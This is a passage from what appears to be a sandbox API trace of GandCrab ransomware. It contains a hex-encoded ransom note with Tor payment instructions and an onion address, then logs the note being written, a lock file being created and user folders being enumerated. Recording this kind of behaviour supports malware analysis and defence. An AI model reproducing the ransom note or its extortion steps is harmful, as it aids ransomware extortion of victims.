65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.102] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0095.113] CloseHandle (hObject=0x230) returned 1 [0095.113] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.114] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.114] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x1af)) [0095.114] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.114] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.114] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.114] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\d2ca4a09d2ca4deb61a.lock") returned 57 [0095.114] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\start menu\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.121] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.121] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.121] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\") returned 33 [0095.122] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\*" [0095.122] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.122] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Start Menu\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.122] CloseHandle (hObject=0x230) returned 1 [0095.122] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.122] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0095.122] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0095.122] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Templates" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates") returned="C:\\Users\\CIiHmnxMn6Ps\\Templates" [0095.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Templates\\" [0095.123] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.123] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.123] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.123] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.124] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.124] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.124] VirtualAlloc 